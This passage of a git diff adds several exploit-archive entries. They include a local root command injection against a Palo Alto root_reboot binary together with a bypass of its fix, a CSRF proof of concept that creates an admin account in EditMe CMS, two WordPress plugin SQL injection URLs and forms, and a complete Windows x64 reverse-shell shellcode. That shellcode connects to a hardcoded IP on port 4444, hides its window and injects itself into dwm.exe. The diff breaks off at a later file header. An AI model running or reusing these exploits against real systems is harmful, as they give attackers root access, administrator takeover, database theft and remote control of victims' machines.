is trivially exploitable, for example: + + +$ ls -l /usr/local/bin/root_reboot +-rwsr-xr-x 1 root root 16275 Oct 17 2014 /usr/local/bin/root_reboot +$ root_reboot --restart '"; bash -i; echo "' +# id +uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin) + +Palo Alto pointed out that they had already fixed this bug in an update that I needed to apply: + +https://securityadvisories.paloaltonetworks.com/Home/Detail/45 + +However, looking at the fix they had essentially just checked that each character in the "reason" parameter was alphanumeric or white space. This does not prevent exploitation, you can just do this: + +$ env SHELLOPTS=xtrace PS4='$(id)' root_reboot --restart whatever +uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin) + diff --git a/platforms/php/webapps/40776.txt b/platforms/php/webapps/40776.txt new file mode 100755 index 000000000..820422387 --- /dev/null +++ b/platforms/php/webapps/40776.txt @@ -0,0 +1,146 @@ +Document Title: +=============== +EditMe CMS - CSRF Privilege Escalate Web Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=1996 + + +Release Date: +============= +2016-11-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1996 + + +Common Vulnerability Scoring System: +==================================== +2.8 + + +Product & Service Introduction: +=============================== +EditMe is a framework that serves as a Platform as a Service to build custom Web Applications, Web Prototyping,and Web CMS. +CMS in which any page can be a server side script that implements whatever dynamic functionality you dream up. That's EditMe. No FTP servers, compilers or IDEs required. EditMe's API uses server-side JavaScript and our templates use XML, so there are no new languages to lear. + +(Copy of the Vendor Homepage: http://www.editme.com/ ) + + +Abstract Advisory Information: +============================== +An independent vulnerability laboratory researcher discovered a csrf privilege escalate web vulnerability in the official EditMe content managament system. + + +Vulnerability Disclosure Timeline: +================================== +2016-11-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Technical Details & Description: +================================ +A cross site request forgery vulnerability has been discovered in the official EditMe content managament system. +The vulnerability allows to perform malicious client-side web-application requests to execute non-protected functions +with own web context. + +In the absence of security token, an attacker could execute arbitrary code in the administrators browser to gain +unauthorized access to the administrator access privileges. + + +Proof of Concept (PoC): +======================= +Cross site request forgery web vulnerability can be exploited by malicious web application without privileged user account and without user interaction. +To demonstrate safety or reproduce csrf web vulnerability information and follow the steps below to continue provided. + + +--- PoC: CSRF Exploitation --- + +

Privilege Escalate CSRF Vulnerability

+
+ + + + + + + + +
+ + + +--- PoC Session Logs [POST]--- +Status: 200 [OK] +Host: pentest.editme.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101 Firefox/49.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Cookie: __utma=164978144.641387690.1478254033.1478262268.1478328738.3; __utmz=164978144.1478328738.3.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); km_lv=x; km_ai=i3E6P9IiO690CMxX353C5RCJAVY%3D; km_uq=; __utma=1.330307796.1478254213.1478254213.1478329355.2; __utmz=1.1478254213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=164978144.3.10.1478328738; __utmc=164978144; JSESSIONID=377D65CA3361D7998A1173C97420C846; visited=" Home 404"; __utmb=1.24.10.1478329355; __utmc=1; __utmt=1; editme-user=admin; editme-key="ECiu7PBk57GYeaLPUxHeDw==" +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 153 +- +POST Method: mode=AdminAdd&redirect=&user-groupname=A&user-username=VulnerabilityLab&user-password=1234&user-password2=1234&user-email=tested%40live.fr®Submit=Save + + + +Security Risk: +============== +The security rsik of the client-side cross site request forgery web vulnerability in the application is estimated as medium. (CVSS 2.8) + + +Credits & Authors: +================== +ZwX - (http://zwx.fr/) )[http://www.vulnerability-lab.com/show.php?user=ZwX] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, +including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised +of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing +limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically +redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or +its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific +authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. + + Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com + + diff --git a/platforms/php/webapps/40782.txt b/platforms/php/webapps/40782.txt new file mode 100755 index 000000000..ee71168c6 --- /dev/null +++ b/platforms/php/webapps/40782.txt @@ -0,0 +1,27 @@ +# Exploit Title: BBS e-Franchise 1.1.1 Plugin of WordPress – Sql Injection +# Date: 12/11/2016 +# Exploit Author: Lenon Leite +# Vendor Homepage: https://wordpress.org/plugins/bbs-e-franchise/ +# Software Link: https://wordpress.org/plugins/bbs-e-franchise/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 1.1.1 +# Tested on: Windows 8.1 + +1 - Description: + +$_GET[‘uid’] is not escaped. Url is accessible for any user. +I will have find post or page that usage plugin, that use shortcode + +http://lenonleite.com.br/en/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/ + + +2 - Proof of Concept: + +http://target/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1 + + +3 - Timeline: +12/11/2016 - Discovered +12/11/2016 - vendor not found \ No newline at end of file diff --git a/platforms/php/webapps/40783.txt b/platforms/php/webapps/40783.txt new file mode 100755 index 000000000..172d6b361 --- /dev/null +++ b/platforms/php/webapps/40783.txt @@ -0,0 +1,35 @@ +# Exploit Title: Product Catalog 8 1.2 Plugin WordPress – Sql Injection +# Date: 12/11/2016 +# Exploit Author: Lenon Leite +# Vendor Homepage: https://wordpress.org/plugins/product-catalog-8/ +# Software Link: https://wordpress.org/plugins/product-catalog-8/ +# Contact: http://twitter.com/lenonleite +# Website: http://lenonleite.com.br/ +# Category: webapps +# Version: 1.2 +# Tested on: Windows 8.1 + +1 - Description: + +$_POST[ ‘selectedCategory’ ] is not escaped. +UpdateCategoryList() is accessible for any user. + +http://lenonleite.com.br/en/blog/2016/11/18/product-catalog-8-plugin-wordpress-sql-injection/ + +2 - Proof of Concept: + +
+ + + +
+ +3 - Timeline: + +12/11/2016 - Discovered +12/11/2016 - vendor not found + +-- +Atenciosamente + +Lenon Leite diff --git a/platforms/win_x86-64/shellcode/40781.c b/platforms/win_x86-64/shellcode/40781.c new file mode 100755 index 000000000..9ddb29aef --- /dev/null +++ b/platforms/win_x86-64/shellcode/40781.c @@ -0,0 +1,658 @@ +/* + # Title : Windows x64 Reverse Shell TCP shellcode + # size : 694 bytes + # Author: Roziul Hasan Khan Shifat + # Date : 10-11-2016 + # Tested on : Windows 7 x64 Professional + # Email : shifath12@gmail.com +*/ + + +/* + + + + + +Disassembly of section .text: + +0000000000000000 : + 0: 48 31 d2 xor %rdx,%rdx + 3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax + 8: 48 8b 70 18 mov 0x18(%rax),%rsi + c: 48 8b 76 10 mov 0x10(%rsi),%rsi + 10: 48 ad lods %ds:(%rsi),%rax + 12: 48 8b 30 mov (%rax),%rsi + 15: 48 8b 7e 30 mov 0x30(%rsi),%rdi + 19: b2 88 mov $0x88,%dl + 1b: 8b 5f 3c mov 0x3c(%rdi),%ebx + 1e: 48 01 fb add %rdi,%rbx + 21: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 24: 48 01 fb add %rdi,%rbx + 27: 44 8b 73 1c mov 0x1c(%rbx),%r14d + 2b: 49 01 fe add %rdi,%r14 + 2e: 66 ba fc 0c mov $0xcfc,%dx + 32: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 36: 48 01 fb add %rdi,%rbx + 39: 48 31 d2 xor %rdx,%rdx + 3c: 52 push %rdx + 3d: 52 push %rdx + 3e: c7 04 24 77 73 32 5f movl $0x5f327377,(%rsp) + 45: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp) + 4c: 64 + 4d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp) + 54: 48 8d 0c 24 lea (%rsp),%rcx + 58: 48 83 ec 58 sub $0x58,%rsp + 5c: ff d3 callq *%rbx + 5e: 48 83 c4 68 add $0x68,%rsp + 62: 48 89 c6 mov %rax,%rsi + 65: 48 31 db xor %rbx,%rbx + 68: 48 31 d2 xor %rdx,%rdx + 6b: b2 88 mov $0x88,%dl + 6d: 8b 5e 3c mov 0x3c(%rsi),%ebx + 70: 48 01 f3 add %rsi,%rbx + 73: 8b 1c 13 mov (%rbx,%rdx,1),%ebx + 76: 48 01 f3 add %rsi,%rbx + 79: 44 8b 7b 1c mov 0x1c(%rbx),%r15d + 7d: 49 01 f7 add %rsi,%r15 + 80: 48 31 d2 xor %rdx,%rdx + 83: 66 ba c8 01 mov $0x1c8,%dx + 87: 41 8b 1c 17 mov (%r15,%rdx,1),%ebx + 8b: 48 01 f3 add %rsi,%rbx + 8e: 66 ba 98 01 mov $0x198,%dx + 92: 48 29 d4 sub %rdx,%rsp + 95: 48 8d 14 24 lea (%rsp),%rdx + 99: 48 31 c9 xor %rcx,%rcx + 9c: 66 b9 02 02 mov $0x202,%cx + a0: 48 83 ec 58 sub $0x58,%rsp + a4: ff d3 callq *%rbx + a6: 48 31 d2 xor %rdx,%rdx + a9: 48 83 ec 58 sub $0x58,%rsp + ad: 48 89 54 24 20 mov %rdx,0x20(%rsp) + b2: 48 89 54 24 28 mov %rdx,0x28(%rsp) + b7: 48 ff c2 inc %rdx + ba: 48 89 d1 mov %rdx,%rcx + bd: 48 ff c1 inc %rcx + c0: 4d 31 c0 xor %r8,%r8 + c3: 49 83 c0 06 add $0x6,%r8 + c7: 4d 31 c9 xor %r9,%r9 + ca: 66 41 b9 88 01 mov $0x188,%r9w + cf: 43 8b 1c 0f mov (%r15,%r9,1),%ebx + d3: 48 01 f3 add %rsi,%rbx + d6: 4d 31 c9 xor %r9,%r9 + d9: ff d3 callq *%rbx + db: 49 89 c5 mov %rax,%r13 + de: 4d 31 c0 xor %r8,%r8 + e1: 41 50 push %r8 + e3: 41 50 push %r8 + e5: c6 04 24 02 movb $0x2,(%rsp) + e9: 66 c7 44 24 02 11 5c movw $0x5c11,0x2(%rsp) + f0: c7 44 24 04 c0 a8 0a movl $0x800aa8c0,0x4(%rsp) + f7: 80 + f8: 4c 8d 24 24 lea (%rsp),%r12 + fc: 48 83 ec 58 sub $0x58,%rsp + +0000000000000100 : + 100: 48 31 db xor %rbx,%rbx + 103: 41 8b 5f 0c mov 0xc(%r15),%ebx + 107: 48 01 f3 add %rsi,%rbx + 10a: 4c 89 e2 mov %r12,%rdx + 10d: 4c 89 e9 mov %r13,%rcx + 110: 41 b0 10 mov $0x10,%r8b + 113: ff d3 callq *%rbx + 115: 4d 31 c0 xor %r8,%r8 + 118: 4c 39 c0 cmp %r8,%rax + 11b: 75 e3 jne 100 + 11d: 48 31 db xor %rbx,%rbx + 120: 41 8b 5e 40 mov 0x40(%r14),%ebx + 124: 48 01 fb add %rdi,%rbx + 127: ff d3 callq *%rbx + 129: 48 31 d2 xor %rdx,%rdx + 12c: 52 push %rdx + 12d: 52 push %rdx + 12e: c7 04 24 75 73 65 72 movl $0x72657375,(%rsp) + 135: c7 44 24 04 33 32 2e movl $0x642e3233,0x4(%rsp) + 13c: 64 + 13d: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp) + 144: 48 8d 0c 24 lea (%rsp),%rcx + 148: 66 ba fc 0c mov $0xcfc,%dx + 14c: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 150: 48 01 fb add %rdi,%rbx + 153: 48 83 ec 58 sub $0x58,%rsp + 157: ff d3 callq *%rbx + 159: 48 89 c6 mov %rax,%rsi + 15c: 48 31 db xor %rbx,%rbx + 15f: 48 31 d2 xor %rdx,%rdx + 162: 66 ba 4a 02 mov $0x24a,%dx + 166: 45 8b 24 96 mov (%r14,%rdx,4),%r12d + 16a: 49 01 fc add %rdi,%r12 + 16d: 48 31 c9 xor %rcx,%rcx + 170: 51 push %rcx + 171: 51 push %rcx + 172: c7 04 24 46 69 6e 64 movl $0x646e6946,(%rsp) + 179: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp) + 180: 64 + 181: c7 44 24 08 6f 77 41 movl $0x4141776f,0x8(%rsp) + 188: 41 + 189: 80 74 24 0b 41 xorb $0x41,0xb(%rsp) + 18e: 48 8d 14 24 lea (%rsp),%rdx + 192: 48 89 f1 mov %rsi,%rcx + 195: 48 83 ec 58 sub $0x58,%rsp + 199: 41 ff d4 callq *%r12 + 19c: 48 31 d2 xor %rdx,%rdx + 19f: 52 push %rdx + 1a0: 52 push %rdx + 1a1: 52 push %rdx + 1a2: c7 04 24 43 6f 6e 73 movl $0x736e6f43,(%rsp) + 1a9: c7 44 24 04 6f 6c 65 movl $0x57656c6f,0x4(%rsp) + 1b0: 57 + 1b1: c7 44 24 08 69 6e 64 movl $0x6f646e69,0x8(%rsp) + 1b8: 6f + 1b9: c7 44 24 0c 77 43 6c movl $0x616c4377,0xc(%rsp) + 1c0: 61 + 1c1: 66 c7 44 24 10 73 73 movw $0x7373,0x10(%rsp) + 1c8: 48 8d 0c 24 lea (%rsp),%rcx + 1cc: 48 83 ec 58 sub $0x58,%rsp + 1d0: ff d0 callq *%rax + 1d2: 49 89 c7 mov %rax,%r15 + 1d5: 48 31 d2 xor %rdx,%rdx + 1d8: 48 31 c9 xor %rcx,%rcx + 1db: 51 push %rcx + 1dc: 51 push %rcx + 1dd: c7 04 24 53 68 6f 77 movl $0x776f6853,(%rsp) + 1e4: c7 44 24 04 57 69 6e movl $0x646e6957,0x4(%rsp) + 1eb: 64 + 1ec: 66 c7 44 24 08 6f 77 movw $0x776f,0x8(%rsp) + 1f3: 48 8d 14 24 lea (%rsp),%rdx + 1f7: 48 89 f1 mov %rsi,%rcx + 1fa: 48 83 ec 58 sub $0x58,%rsp + 1fe: 41 ff d4 callq *%r12 + 201: 4c 89 f9 mov %r15,%rcx + 204: 48 31 d2 xor %rdx,%rdx + 207: 48 83 ec 58 sub $0x58,%rsp + 20b: ff d0 callq *%rax + 20d: 66 ba 90 02 mov $0x290,%dx + 211: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 215: 48 01 fb add %rdi,%rbx + 218: 48 83 ec 68 sub $0x68,%rsp + 21c: 48 83 ec 18 sub $0x18,%rsp + 220: 4c 8d 24 24 lea (%rsp),%r12 + 224: b2 68 mov $0x68,%dl + 226: 48 31 c9 xor %rcx,%rcx + 229: 41 89 14 24 mov %edx,(%r12) + 22d: 49 89 4c 24 04 mov %rcx,0x4(%r12) + 232: 49 89 4c 24 0c mov %rcx,0xc(%r12) + 237: 49 89 4c 24 14 mov %rcx,0x14(%r12) + 23c: 49 89 4c 24 18 mov %rcx,0x18(%r12) + 241: 48 31 d2 xor %rdx,%rdx + 244: b2 ff mov $0xff,%dl + 246: 48 ff c2 inc %rdx + 249: 41 89 54 24 3c mov %edx,0x3c(%r12) + 24e: 4d 89 6c 24 50 mov %r13,0x50(%r12) + 253: 4d 89 6c 24 58 mov %r13,0x58(%r12) + 258: 4d 89 6c 24 60 mov %r13,0x60(%r12) + 25d: 68 63 6d 64 41 pushq $0x41646d63 + 262: 88 54 24 03 mov %dl,0x3(%rsp) + 266: 48 8d 14 24 lea (%rsp),%rdx + 26a: 48 ff c1 inc %rcx + 26d: 48 83 ec 58 sub $0x58,%rsp + 271: 48 89 4c 24 20 mov %rcx,0x20(%rsp) + 276: 48 31 c9 xor %rcx,%rcx + 279: 4d 31 c0 xor %r8,%r8 + 27c: 4c 89 44 24 28 mov %r8,0x28(%rsp) + 281: 4c 89 44 24 30 mov %r8,0x30(%rsp) + 286: 4c 89 44 24 38 mov %r8,0x38(%rsp) + 28b: 4d 8d 0c 24 lea (%r12),%r9 + 28f: 4c 89 4c 24 40 mov %r9,0x40(%rsp) + 294: 4d 8d 4c 24 68 lea 0x68(%r12),%r9 + 299: 4c 89 4c 24 48 mov %r9,0x48(%rsp) + 29e: 4d 31 c9 xor %r9,%r9 + 2a1: ff d3 callq *%rbx + 2a3: 48 31 d2 xor %rdx,%rdx + 2a6: 66 ba a0 04 mov $0x4a0,%dx + 2aa: 41 8b 1c 16 mov (%r14,%rdx,1),%ebx + 2ae: 48 01 fb add %rdi,%rbx + 2b1: 48 31 c9 xor %rcx,%rcx + 2b4: ff d3 callq *%rbx + + + + + + + +*/ + + + + +/* + +section .text + global s +s: + +xor rdx,rdx +mov rax,[gs:rdx+0x60] +mov rsi,[rax+0x18] +mov rsi,[rsi+0x10] +lodsq +mov rsi,[rax] +mov rdi,[rsi+0x30] + +;-------------------------------- +mov dl,0x88 +mov ebx,[rdi+0x3c] +add rbx,rdi +mov ebx,[rbx+rdx] +add rbx,rdi ;IMAGE_EXPORT_DIRECTORY + + +mov r14d,[rbx+0x1c] +add r14,rdi ;kernel32.dll AddressOfFunctions + + +;----------------------- +;loading ws2_32.dll + +mov dx,831*4 +mov ebx,[r14+rdx] +add rbx,rdi ;LoadLibraryA() + +xor rdx,rdx +push rdx +push rdx + +mov [rsp],dword 'ws2_' +mov [rsp+4],dword '32.d' +mov [rsp+8],word 'll' + + +lea rcx,[rsp] + +sub rsp,88 + +call rbx + +add rsp,104 + +mov rsi,rax ;ws2_32.dll base address +;-------------------------------------- +xor rbx,rbx +xor rdx,rdx + +;finding Export table of ws2_32.dll + +mov dl,0x88 +mov ebx,[rsi+0x3c] +add rbx,rsi +mov ebx,[rbx+rdx] +add rbx,rsi ;IMAGE_EXPORT_DIRECTORY + + +mov r15d,[rbx+0x1c] +add r15,rsi ;ws2_32.dll AddressOfFunctions + + +;-------------------------------------- + +;WSAStartup(514,&WSADATA) + +xor rdx,rdx +mov dx,114*4 +mov ebx,[r15+rdx] +add rbx,rsi ;rbx=WSAStartup() + + +mov dx,408 + +sub rsp,rdx +lea rdx,[rsp] +xor rcx,rcx +mov cx,514 + +sub rsp,88 ;reserving space for API call (Important) + +call rbx + +;------------------------------------------------------- +;WSASocketA(2,1,6,0,0,0) + +xor rdx,rdx +sub rsp,88 + +mov [rsp+32],rdx +mov [rsp+40],rdx + + +inc rdx +mov rcx,rdx +inc rcx + +xor r8,r8 +add r8,6 + +xor r9,r9 + +mov r9w,98*4 +mov ebx,[r15+r9] +add rbx,rsi ;rbx=WSASocketA() + +xor r9,r9 +call rbx + +mov r13,rax ;r13=SOCKET + +;------------------------------------------ +xor r8,r8 +push r8 +push r8 + +mov [rsp],byte 2 +mov [rsp+2],word 0x5c11 ;port 4444 +mov [rsp+4],dword 0x800aa8c0 ;change it +lea r12,[rsp] +sub rsp,88 +;------------------------------------------- +;connect(SOCKET,(struct sockaddr *)&struct sockaddr_in,16) +c: +xor rbx,rbx +mov ebx,[r15+12] +add rbx,rsi ;rbx=connect() + + + +mov rdx,r12 +mov rcx,r13 +mov r8b,16 + + + +call rbx +xor r8,r8 +cmp rax,r8 +jnz c + +;---------------------------------------------------------------------------------------- +;Hiding Window +;---------------------------------------------------------------------------------------- + +;AllocConsole() +xor rbx,rbx +mov ebx,[r14+64] +add rbx,rdi ;rbx=AllocConsole() + +call rbx +;------------------------------ +;loading user32.dll + +xor rdx,rdx +push rdx +push rdx +mov [rsp],dword 'user' +mov [rsp+4],dword '32.d' +mov [rsp+8],word 'll' +lea rcx,[rsp] + +mov dx,831*4 +mov ebx,[r14+rdx] +add rbx,rdi +sub rsp,88 + +call rbx + +mov rsi,rax +;-------------------------------- + +xor rbx,rbx +xor rdx,rdx + +;---------------------------------- +;FindWindowA("ConsoleWindowClass",NULL) + +mov dx,586 +mov r12d,[r14+rdx*4] +add r12,rdi ;rbx=GetProcAddress() + +xor rcx,rcx +push rcx +push rcx +mov [rsp],dword 'Find' +mov [rsp+4],dword 'Wind' +mov [rsp+8],dword 'owAA' +xor byte [rsp+11],0x41 + +lea rdx,[rsp] +mov rcx,rsi + +sub rsp,88 +call r12 + + + +;----------------------------------- +xor rdx,rdx +push rdx +push rdx +push rdx + +mov [rsp],dword 'Cons' +mov [rsp+4],dword 'oleW' +mov [rsp+8],dword 'indo' +mov [rsp+12],dword 'wCla' +mov [rsp+16],word 'ss' + +lea rcx,[rsp] + +sub rsp,88 + +call rax + +mov r15,rax +xor rdx,rdx +;--------------------------------------- +;ShowWindow(HWND,0) + +xor rcx,rcx +push rcx +push rcx +mov [rsp],dword 'Show' +mov [rsp+4],dword 'Wind' +mov [rsp+8],word 'ow' + +lea rdx,[rsp] +mov rcx,rsi + +sub rsp,88 +call r12 + + +mov rcx,r15 +xor rdx,rdx +sub rsp,88 +call rax + +;----------------------------------------------- + +;-------------------------------------------------------------------------------------------------------------------------------- +;CreateProcessA() +mov dx,164*4 +mov ebx,[r14+rdx] +add rbx,rdi + + +;STARTUPINFOA+PROCESS_INFORMATION +;---------------------------------- +sub rsp,104 +sub rsp,24 +lea r12,[rsp] + +mov dl,104 + +xor rcx,rcx +mov [r12],dword edx +mov [r12+4],rcx +mov [r12+12],rcx +mov [r12+20],rcx +mov [r12+24],rcx + +xor rdx,rdx +mov dl,255 +inc rdx + +mov [r12+0x3c],edx +mov [r12+0x50],r13 +mov [r12+0x58],r13 +mov [r12+0x60],r13 + +;-------------------------------------------------- + +push 'cmdA' +mov [rsp+3],byte dl + +lea rdx,[rsp] + +inc rcx +;------------------------------------- +sub rsp,88 + +mov [rsp+32],rcx +xor rcx,rcx + +xor r8,r8 + +mov [rsp+40],r8 +mov [rsp+48],r8 +mov [rsp+56],r8 +lea r9,[r12] +mov [rsp+64],r9 +lea r9,[r12+104] +mov [rsp+72],r9 + +xor r9,r9 + +call rbx + +;------------------------------- + +xor rdx,rdx +mov dx,296*4 +mov ebx,[r14+rdx] +add rbx,rdi + +xor rcx,rcx +call rbx + + + + +*/ + + + + + + +#include +#include +#include +#include + + +char shellcode[]="\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\xb2\x88\x8b\x5f\x3c\x48\x01\xfb\x8b\x1c\x13\x48\x01\xfb\x44\x8b\x73\x1c\x49\x01\xfe\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xd2\x52\x52\xc7\x04\x24\x77\x73\x32\x5f\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x48\x83\xc4\x68\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\xb2\x88\x8b\x5e\x3c\x48\x01\xf3\x8b\x1c\x13\x48\x01\xf3\x44\x8b\x7b\x1c\x49\x01\xf7\x48\x31\xd2\x66\xba\xc8\x01\x41\x8b\x1c\x17\x48\x01\xf3\x66\xba\x98\x01\x48\x29\xd4\x48\x8d\x14\x24\x48\x31\xc9\x66\xb9\x02\x02\x48\x83\xec\x58\xff\xd3\x48\x31\xd2\x48\x83\xec\x58\x48\x89\x54\x24\x20\x48\x89\x54\x24\x28\x48\xff\xc2\x48\x89\xd1\x48\xff\xc1\x4d\x31\xc0\x49\x83\xc0\x06\x4d\x31\xc9\x66\x41\xb9\x88\x01\x43\x8b\x1c\x0f\x48\x01\xf3\x4d\x31\xc9\xff\xd3\x49\x89\xc5\x4d\x31\xc0\x41\x50\x41\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x0a\x80\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x31\xdb\x41\x8b\x5f\x0c\x48\x01\xf3\x4c\x89\xe2\x4c\x89\xe9\x41\xb0\x10\xff\xd3\x4d\x31\xc0\x4c\x39\xc0\x75\xe3\x48\x31\xdb\x41\x8b\x5e\x40\x48\x01\xfb\xff\xd3\x48\x31\xd2\x52\x52\xc7\x04\x24\x75\x73\x65\x72\xc7\x44\x24\x04\x33\x32\x2e\x64\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x66\xba\xfc\x0c\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x58\xff\xd3\x48\x89\xc6\x48\x31\xdb\x48\x31\xd2\x66\xba\x4a\x02\x45\x8b\x24\x96\x49\x01\xfc\x48\x31\xc9\x51\x51\xc7\x04\x24\x46\x69\x6e\x64\xc7\x44\x24\x04\x57\x69\x6e\x64\xc7\x44\x24\x08\x6f\x77\x41\x41\x80\x74\x24\x0b\x41\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x48\x31\xd2\x52\x52\x52\xc7\x04\x24\x43\x6f\x6e\x73\xc7\x44\x24\x04\x6f\x6c\x65\x57\xc7\x44\x24\x08\x69\x6e\x64\x6f\xc7\x44\x24\x0c\x77\x43\x6c\x61\x66\xc7\x44\x24\x10\x73\x73\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd0\x49\x89\xc7\x48\x31\xd2\x48\x31\xc9\x51\x51\xc7\x04\x24\x53\x68\x6f\x77\xc7\x44\x24\x04\x57\x69\x6e\x64\x66\xc7\x44\x24\x08\x6f\x77\x48\x8d\x14\x24\x48\x89\xf1\x48\x83\xec\x58\x41\xff\xd4\x4c\x89\xf9\x48\x31\xd2\x48\x83\xec\x58\xff\xd0\x66\xba\x90\x02\x41\x8b\x1c\x16\x48\x01\xfb\x48\x83\xec\x68\x48\x83\xec\x18\x4c\x8d\x24\x24\xb2\x68\x48\x31\xc9\x41\x89\x14\x24\x49\x89\x4c\x24\x04\x49\x89\x4c\x24\x0c\x49\x89\x4c\x24\x14\x49\x89\x4c\x24\x18\x48\x31\xd2\xb2\xff\x48\xff\xc2\x41\x89\x54\x24\x3c\x4d\x89\x6c\x24\x50\x4d\x89\x6c\x24\x58\x4d\x89\x6c\x24\x60\x68\x63\x6d\x64\x41\x88\x54\x24\x03\x48\x8d\x14\x24\x48\xff\xc1\x48\x83\xec\x58\x48\x89\x4c\x24\x20\x48\x31\xc9\x4d\x31\xc0\x4c\x89\x44\x24\x28\x4c\x89\x44\x24\x30\x4c\x89\x44\x24\x38\x4d\x8d\x0c\x24\x4c\x89\x4c\x24\x40\x4d\x8d\x4c\x24\x68\x4c\x89\x4c\x24\x48\x4d\x31\xc9\xff\xd3\x48\x31\xd2\x66\xba\xa0\x04\x41\x8b\x1c\x16\x48\x01\xfb\x48\x31\xc9\xff\xd3"; + + + + +void inject(DWORD ); +int main() +{ + char program_name[]="dwm.exe"; //Process name to inject. change it if U Want + + BOOL f=0; + HANDLE snap; + PROCESSENTRY32 pe32; + + snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); + + if(snap==INVALID_HANDLE_VALUE) + { + printf("CreateToolhelp32Snapshot() Failed."); return 0; + } + + pe32.dwSize=sizeof(pe32); + + if(!Process32First(snap,&pe32)) + { + printf("Process32First() Failed."); return 0; + } + + + + do + { + if(0==strncmp(program_name,pe32.szExeFile,strlen(program_name))) + { + f=TRUE; + break; + } + + }while(Process32Next(snap,&pe32)); + + + if(!f) + { + printf("No infomation found about \"%s\" ",program_name); + } + else + { + printf("Program name:%s\nProcess id: %d",pe32.szExeFile,pe32.th32ProcessID); + printf("\nInjecting shellcode"); + inject(pe32.th32ProcessID); + } + + + + return 0; + +} + + + +void inject(DWORD pid) +{ + HANDLE phd,h; + LPVOID shell; + + phd=OpenProcess(PROCESS_ALL_ACCESS,0,pid); + + if(phd==INVALID_HANDLE_VALUE) + { + printf("\nOpenProcess() Failed."); return ; + } + + shell=VirtualAllocEx(phd,0,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE); + if(shell==NULL) + { + printf("\nVirtualAllocEx() Failed"); CloseHandle(phd); return ; + } + + WriteProcessMemory(phd,shell,shellcode,sizeof(shellcode),0); + printf("\nInjection successfull\n"); + printf("Running Shellcode......\n"); + + h=CreateRemoteThread(phd,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0); + if(h==NULL) + { + printf("Failed to Run Shellcode\n"); return ; + } + else + printf("shellcode Execution Successfull"); +} + + + + + + + diff --git a/platforms/windows/dos/40779.py b/platforms/windows/dos/40779.py new file mode 100755 index 